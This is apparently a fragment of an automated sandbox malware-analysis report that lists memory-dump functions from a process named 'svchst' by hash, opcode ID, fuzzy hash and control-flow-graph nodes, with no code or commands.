                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: c2a7bc33a02eb14273001e9220f944f2fd134594d5287426697bdb1f93b5a575
                                        • Instruction ID: 68e5a62ca69da29babdef14724658bb4e697b0c398ceee5d14a50e5c8ca13ff7
                                        • Opcode Fuzzy Hash: c2a7bc33a02eb14273001e9220f944f2fd134594d5287426697bdb1f93b5a575
                                        • Instruction Fuzzy Hash: 5A3188B9E052589FDB10CFA9E880ADEFBF1BB49310F24901AE814B7310D735A945CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 878 4f43e18-4f43eca VirtualAlloc 880 4f43ed3-4f43f07 878->880 881 4f43ecc-4f43ed2 878->881 881->880
                                        APIs
                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04F43EBA
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2736219431.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_4f40000_svchst.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 76f60a124af161e886325e4eb7be6dce530940d9337234e4d4cfa1f84e0855d1
                                        • Instruction ID: 59fe35d7930477dc34c698bea75583104668353bb79914d4b45d2d09b1fd7f34
                                        • Opcode Fuzzy Hash: 76f60a124af161e886325e4eb7be6dce530940d9337234e4d4cfa1f84e0855d1
                                        • Instruction Fuzzy Hash: B33186B9E052589FCB10CFA9E880ADEFBB5BB49310F24901AE814B7310D775A945CF64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 884 53176ad-5318fca 894 5318fd0-5318ff8 884->894 895 531812b-5318192 884->895 898 53100fc-5310107 894->898 899 5318ffe-5319007 894->899 895->898 910 5318198-53181a3 895->910 901 5310110-5310389 898->901 902 5310109-531452c call 532ff80 898->902 899->898 901->898 913 531038f-531039a 901->913 907 5314532-5314574 902->907 907->898 915 531457a-5314585 907->915 910->898 913->898 915->898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: add8b2bcc637e3c0574822b93b4e1454801272f2d0516e9427be5f5bbc06b64c
                                        • Instruction ID: 952e1e3d29b08fa3b0e69da671c244aa72a69abe38be7e2114d06348c288f43d
                                        • Opcode Fuzzy Hash: add8b2bcc637e3c0574822b93b4e1454801272f2d0516e9427be5f5bbc06b64c
                                        • Instruction Fuzzy Hash: C341927494022ACFDB78DF24D958BA9B7B1FB48340F1044E9D919A7A91EB705E81EF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 932 53165c9-53165d8 933 531e417-531e452 932->933 934 53165de-5316606 932->934 949 531e45a-531e461 933->949 937 53100fc-5310107 934->937 938 531660c-5316617 934->938 940 5310110-5310389 937->940 941 5310109-531452c call 532ff80 937->941 938->937 940->937 952 531038f-531039a 940->952 947 5314532-5314574 941->947 947->937 954 531457a-5314585 947->954 952->937 954->937
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Y
                                        • API String ID: 0-3233089245
                                        • Opcode ID: 5ec62b14d837548b45f8eda358085d025ec09f7f1766f6fa669fb27fbe34341c
                                        • Instruction ID: 5d3774689fe11c5dbf1fe6e013bf27a39fcc62b3f4aff0efbf9e98557d1a2e41
                                        • Opcode Fuzzy Hash: 5ec62b14d837548b45f8eda358085d025ec09f7f1766f6fa669fb27fbe34341c
                                        • Instruction Fuzzy Hash: F1010234950228CFEB28DF34C9A9BA9B7B6FF44345F4004E8D90AA7290EB305E85DF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 956 e21316-e2131c 975 e21322 call e26148 956->975 976 e21322 call e26138 956->976 957 e21328-e21351 959 e21357-e21362 957->959 960 e21014-e2101d 957->960 959->960 961 e21026-e21976 960->961 962 e2101f 960->962 964 e21987-e219b0 961->964 965 e21978 961->965 962->961 964->960 971 e219b6-e219c1 964->971 966 e21189-e21192 965->966 967 e2197e-e21981 965->967 969 e211a3-e211ae 966->969 970 e21194 966->970 967->964 967->966 969->960 972 e2119a-e2119d 970->972 973 e2126b-e21294 970->973 971->960 972->969 972->973 973->960 975->957 976->957
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "
                                        • API String ID: 0-123907689
                                        • Opcode ID: 1ec665646b18a2246b49eb1010382cd535fd6398196a533e659b6a2a8b56c711
                                        • Instruction ID: b3131b123edb8566617f36690046174a239b5328dadb9bb69f138e0a091f216e
                                        • Opcode Fuzzy Hash: 1ec665646b18a2246b49eb1010382cd535fd6398196a533e659b6a2a8b56c711
                                        • Instruction Fuzzy Hash: FCF09BB0800228CFCF258FA0EA88BDCBBB1BB29304F0055D9D649B2260C7B54EC4DF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 82bad5c93e19da2207a96298199a73064423f9e96faaf0d058f98d79c8249856
                                        • Instruction ID: 33fa166e38e0eee2757e27394d4583034300d00991bf6435def47529aeabad75
                                        • Opcode Fuzzy Hash: 82bad5c93e19da2207a96298199a73064423f9e96faaf0d058f98d79c8249856
                                        • Instruction Fuzzy Hash: C5D0C9B090522E8BDB14CF148448BE976F0BB54340F1050E5D14CA3205D3740AC45F40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f3cde90774930a8daaa9defc0adf1b7bc6f6004e68a1e7138c59bc4f8e557c2
                                        • Instruction ID: 3931c93379b65e487c7ff4b8850d8da9925a430f50f07823f79d5090a637ee64
                                        • Opcode Fuzzy Hash: 7f3cde90774930a8daaa9defc0adf1b7bc6f6004e68a1e7138c59bc4f8e557c2
                                        • Instruction Fuzzy Hash: 90B1BDB490A268CFDB60CFA8E944BDDBBF1AB49314F116099D60DAB254C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5594b99e80f3c592c0e0b805e892b38a0b9b3b309ae416961837b767d96192
                                        • Instruction ID: c5b13fbe37c8eba5fbc7f7e786c51a674efe7fc7b1aff71db8bd27598f1528fa
                                        • Opcode Fuzzy Hash: 4c5594b99e80f3c592c0e0b805e892b38a0b9b3b309ae416961837b767d96192
                                        • Instruction Fuzzy Hash: CEB1BDB490A268CFDB60CFA4D944BDCBBF1AB49314F21A099D60DAB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b07699f32a16e2604c4ecfbb67d84ed9acd4c2ae99127360c450f9559086b619
                                        • Instruction ID: b628c194f0d0a8aad41ba3749d6894798523080926cf14af9be46710fef65a7e
                                        • Opcode Fuzzy Hash: b07699f32a16e2604c4ecfbb67d84ed9acd4c2ae99127360c450f9559086b619
                                        • Instruction Fuzzy Hash: 92B1DEB490A268CFDB60CFA8D984BDDBBF1AB49314F216095D549BB251C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5c26fb8036582d1d6385098d7cf4af4607efa4a8ef86b3891dc9a53719289ab
                                        • Instruction ID: 4850533587a911fe9ab3002ec69e59e5849e0fbe5f744ce8e4e6d4fe4c43f9a2
                                        • Opcode Fuzzy Hash: d5c26fb8036582d1d6385098d7cf4af4607efa4a8ef86b3891dc9a53719289ab
                                        • Instruction Fuzzy Hash: 87A1EEB490A268CFDB60CFA8D984BDDBBF1AB49314F21A095D549AB251C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e17bf8cb5594c08c62b71b4724e5c430c92df332865c12d15d54dc35d6dc5d1
                                        • Instruction ID: de7a1b6846a360376dd3b2801eefa19f0e262168206b6c151bd1e7a5581f2c6c
                                        • Opcode Fuzzy Hash: 8e17bf8cb5594c08c62b71b4724e5c430c92df332865c12d15d54dc35d6dc5d1
                                        • Instruction Fuzzy Hash: BAA1CEB490A268CFDB60CFA8D984BDCBBF1AB49314F116099D54DAB254C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bae72fbcd39e2c2c54fd3bfd32bc3dcec13b739c9fc3604033fa5aaec4ba01c
                                        • Instruction ID: 8a8268906132e541dd24260156c2f8bceded09261cd0ff6fc2fe0b1aa88c1603
                                        • Opcode Fuzzy Hash: 5bae72fbcd39e2c2c54fd3bfd32bc3dcec13b739c9fc3604033fa5aaec4ba01c
                                        • Instruction Fuzzy Hash: EEA1CEB490A268CFDB20CFA4D944BDDBBF1AB49314F21A095D54ABB250C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fb9c03ab164bfbef660f6f47f2178df33460d9970d27ad4d3ad96af59603f9e
                                        • Instruction ID: bbac3be2e9c41769e77a0ed5abe2c16a4e24a5f9c83c3f0aa136b291c21c090f
                                        • Opcode Fuzzy Hash: 2fb9c03ab164bfbef660f6f47f2178df33460d9970d27ad4d3ad96af59603f9e
                                        • Instruction Fuzzy Hash: 28A1CFB490A268CFCB50CFA8D944BDCBBF1AB49314F21A099D549AB255D7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d31a41906128431e6215e209f7b8ac5f4ae5dffcde9c27741094c742ebd9f0bd
                                        • Instruction ID: 872d1cbe8c313e52c38eaf8edf7f638ffc94567e8ff40c587dff0fa1417aed7d
                                        • Opcode Fuzzy Hash: d31a41906128431e6215e209f7b8ac5f4ae5dffcde9c27741094c742ebd9f0bd
                                        • Instruction Fuzzy Hash: 01A1CEB490A268CFDB50CFA8D984BDCBBF1AB49314F216095D549BB251C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 714d57c416a11400eb330e6d0cce3e022b452101a1d3a2822d55f445057de109
                                        • Instruction ID: 4ae3d2a58716e4b5d3596398ab193051cabf6fcca2119331e472108d1ad5c485
                                        • Opcode Fuzzy Hash: 714d57c416a11400eb330e6d0cce3e022b452101a1d3a2822d55f445057de109
                                        • Instruction Fuzzy Hash: 75A1BFB490A268CFDB50CFA8D984BDCBBF1AB49314F21A095D54AAB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f01a8e3704c1a6cd3d8c7f34a73cc2bc962d1b5bed7ff53924324c4ca09ff67
                                        • Instruction ID: c0443e4fa8094031a640c9900de8454177c666ab2256f5c94df174ee554eaf23
                                        • Opcode Fuzzy Hash: 8f01a8e3704c1a6cd3d8c7f34a73cc2bc962d1b5bed7ff53924324c4ca09ff67
                                        • Instruction Fuzzy Hash: 9BA1AEB490A268CFDB50CFA8D984BDCBBF1AB49324F216095D549AB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27d8ed23ef4412be6b182689929e0e61b475f66437e26dceb4cfd549efa895f4
                                        • Instruction ID: 54eee7cb491706ae67d1c9de37ce257cae478266814dc28250f6606520f1d783
                                        • Opcode Fuzzy Hash: 27d8ed23ef4412be6b182689929e0e61b475f66437e26dceb4cfd549efa895f4
                                        • Instruction Fuzzy Hash: 4EA1BEB490A268CFDB60CFA8D984BDCBBF1AB49314F216095D54DAB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e093dda103e8df4c065eddbfa48741f41e945f6a8d7ef6b88d394f54dd726302
                                        • Instruction ID: b69487de906903a50d021adfc73aa2f431dfeb2901b233748fc9a0508d5ec905
                                        • Opcode Fuzzy Hash: e093dda103e8df4c065eddbfa48741f41e945f6a8d7ef6b88d394f54dd726302
                                        • Instruction Fuzzy Hash: FDA1BEB490A268CFDB60CFA8D984BDCBBF1AB49314F21A095D54DAB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b3b889e33fd9bec2364a59101c81680b4ba2a72ebd01db6afef26ed5f9c50d4
                                        • Instruction ID: fb33e45fead56e5085a1b45ceae6cbc96f657322a97ac2105b0a8eb494db4575
                                        • Opcode Fuzzy Hash: 2b3b889e33fd9bec2364a59101c81680b4ba2a72ebd01db6afef26ed5f9c50d4
                                        • Instruction Fuzzy Hash: F4A1BDB490A268CFDB50CFA8D944BDCBBF1AB49314F21A095D54ABB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 118873066ce8de47000aae6165263b5d17a59b2e5862eef1c6e12f1e35e55070
                                        • Instruction ID: cd8886d937955b55d845266cb93380759c2913693b8fd64dfcc57676f4e168bf
                                        • Opcode Fuzzy Hash: 118873066ce8de47000aae6165263b5d17a59b2e5862eef1c6e12f1e35e55070
                                        • Instruction Fuzzy Hash: 63A1CEB490A268CFDB60CFA8D944BDCBBF1AB49314F21A095D64DAB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2738132503.0000000005310000.00000040.00000800.00020000.00000000.sdmp, Offset: 05310000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_5310000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec2171d0f3dde20f8506296117dbac5279a5de4b84d86840ce8f34598d0b1b72
                                        • Instruction ID: 87b7481e1985faa61cda1335b7b6208285a6be2edbb5403a422bf77de3ae61b6
                                        • Opcode Fuzzy Hash: ec2171d0f3dde20f8506296117dbac5279a5de4b84d86840ce8f34598d0b1b72
                                        • Instruction Fuzzy Hash: EC91F270D04A68CFDF04DFA9D858BADBBB6BF49304F00882AE416AB690D7B05D42CF51
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31ffb291a35f120f9cbe233dd3fd9c725c62e6e38356a6b3fc29abe6118e31d5
                                        • Instruction ID: e350ef37663d6719300778b9bebd846e50e275ac56f2b7c374f494a53ca2a6a7
                                        • Opcode Fuzzy Hash: 31ffb291a35f120f9cbe233dd3fd9c725c62e6e38356a6b3fc29abe6118e31d5
                                        • Instruction Fuzzy Hash: 4D91CFB490A268CFDB50CFA8D984BDCBBF1EB49324F216099D549AB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c3bd4dda9f00a0f71c61d290ce3a43c7a3b786d426c6cdbfa1017b656f7ab51
                                        • Instruction ID: aa8b818832cb2f3a163d2f4ba1199b0219480f71b3557d26d01c832b68f16046
                                        • Opcode Fuzzy Hash: 3c3bd4dda9f00a0f71c61d290ce3a43c7a3b786d426c6cdbfa1017b656f7ab51
                                        • Instruction Fuzzy Hash: 61A10574901369CFD720DF68D988B8ABBB5BF49315F1582E6D408AB262C734DE85CF81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 650766bcd6427cad0e91c52d2df22811fea98b5c5e9fc5a0a56931c8eafdc8de
                                        • Instruction ID: 8f52689c3ef6909508df3ce53b1dd81e399ccb9fa90e7f00136348c245bbc597
                                        • Opcode Fuzzy Hash: 650766bcd6427cad0e91c52d2df22811fea98b5c5e9fc5a0a56931c8eafdc8de
                                        • Instruction Fuzzy Hash: D791CFB490A268CFDB50CFA8D984BDCBBF1AB49314F216099D54DAB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d006724b71e2b46c82e29997d6407fbb5322597610f949f482d0805da62ac873
                                        • Instruction ID: 2a1a90a8385d4fda6053551834fc7be72421c6c521928f0a02f84f57dcd2642a
                                        • Opcode Fuzzy Hash: d006724b71e2b46c82e29997d6407fbb5322597610f949f482d0805da62ac873
                                        • Instruction Fuzzy Hash: C891BEB490A268CFDB50CFA8D984BDCBBF1AB49314F21A095D54DAB255C7749EC8CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08d828c97e4ae03a66802557c6290b4dc7fb7b5009ba541353e9e8bdbc50dd9f
                                        • Instruction ID: 05f91443bc5d373950665d931f3899bd97f5dc158ed06ea071c212e1ef1647dd
                                        • Opcode Fuzzy Hash: 08d828c97e4ae03a66802557c6290b4dc7fb7b5009ba541353e9e8bdbc50dd9f
                                        • Instruction Fuzzy Hash: 5871F2B4E0520C9FDB04DFA9E5846AEBBF2FF89301F208069E505AB358EB745946CF51
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbf277b38ce5c516084a2aa5eb214febd6d38b17b5d0936da33326cae213195b
                                        • Instruction ID: d64891c1baed8426afc695d7b7bfac029f241a3ecbe91466f7229303ba80efe3
                                        • Opcode Fuzzy Hash: fbf277b38ce5c516084a2aa5eb214febd6d38b17b5d0936da33326cae213195b
                                        • Instruction Fuzzy Hash: 8A5127B0D0425DCFDB04EFA8D8457AEBBB1FF49304F109069D619BB294EB745A85CB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68bf07a022686104c443dafcda4ff085b66e7f87265c12fd38d39c6016746b91
                                        • Instruction ID: 1bccb96067450ee6942ad37b6320f0e717dcddb0243eaf2519c7c5d6976e62ad
                                        • Opcode Fuzzy Hash: 68bf07a022686104c443dafcda4ff085b66e7f87265c12fd38d39c6016746b91
                                        • Instruction Fuzzy Hash: AF5106B4D0421DCFDB04EFA8E8457AEBBB1FF89304F109129D619BB294EB745985CB80
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0447325da1b0c6a665f00554bb7e135a851e2b61f34676cf229e880bfde6866
                                        • Instruction ID: f2f35d9d10102dd81d0e895c9604df13d58a3d26c75bd29c107a75fe540abe58
                                        • Opcode Fuzzy Hash: f0447325da1b0c6a665f00554bb7e135a851e2b61f34676cf229e880bfde6866
                                        • Instruction Fuzzy Hash: 9841CF75A00219DFCB04CFA9D9849AEBBF1FF89314F1580AAE914EB321D731AA05CF50
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a0fbc3678674d47f92a05d15ec2188fd47093b0dda04df5117b19a4a7d06f01
                                        • Instruction ID: 90a630649119a91d8467d3ed8e9dee354e9a84cdd7639618ea1761f699d08e3e
                                        • Opcode Fuzzy Hash: 7a0fbc3678674d47f92a05d15ec2188fd47093b0dda04df5117b19a4a7d06f01
                                        • Instruction Fuzzy Hash: C62115B4D04219CFDB04EFA9D8447EEBBF1AF89301F10946AD428B7291D7740A46CF91
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cf5977cb8b0ddfc7f6036c80e1ca28f43331f9ab2c1a643582498c37d748105
                                        • Instruction ID: 7c9a53fa01ae311c67412b56d7952904e79b3a8a27f6f613cb9c632b5050f2b4
                                        • Opcode Fuzzy Hash: 0cf5977cb8b0ddfc7f6036c80e1ca28f43331f9ab2c1a643582498c37d748105
                                        • Instruction Fuzzy Hash: 7F2123B0D09259CFDB04DFA9E8447EEBBB1EF88315F20906AC525B32A0D7741A44CFA1
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aad6863a71f9bc4200a83dfda22e7c35cd1825f9be43df8801ffeccad9831401
                                        • Instruction ID: 8065645ddc7db33c0e4cc2b9bfd5af54777e8b7c5d33ec1ee3b3eece6d271531
                                        • Opcode Fuzzy Hash: aad6863a71f9bc4200a83dfda22e7c35cd1825f9be43df8801ffeccad9831401
                                        • Instruction Fuzzy Hash: D121E8B4D04219CFDB04EFAAD8447EEBBF1BB88301F609429D529B3290D7744A45DF95
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 493c37dd5c869b702278529b415fdcf7ffa8a0b5c0195a6f5eb5cbf070c493e4
                                        • Instruction ID: adcf1813efffc6ee2243000f3dcdf19b03752e89f8c3093890d0618805d8b62b
                                        • Opcode Fuzzy Hash: 493c37dd5c869b702278529b415fdcf7ffa8a0b5c0195a6f5eb5cbf070c493e4
                                        • Instruction Fuzzy Hash: 35214FB0D05218DFEB09DFA9E4467AEBBF1FF49304F1080AAD114E72A6D3744A85CB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 095249eb4883d6cd9fb43c17d9a4adbd31a8626a995f2edc8e32f7553c731452
                                        • Instruction ID: b003e05e013d681e1170325cd2d220659a4dafc16e028a0f2c4e962b9269c276
                                        • Opcode Fuzzy Hash: 095249eb4883d6cd9fb43c17d9a4adbd31a8626a995f2edc8e32f7553c731452
                                        • Instruction Fuzzy Hash: 9721D6B4D05229CFDB04DFAAE8447EEBBB5EF88315F10942AD925B3250D7B41A44CFA1
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.2726489356.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_e20000_svchst.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: caf4ca2ef223f440f8351a923ee79a88cbb20f1ccc3a7d4587da111410bfe52a
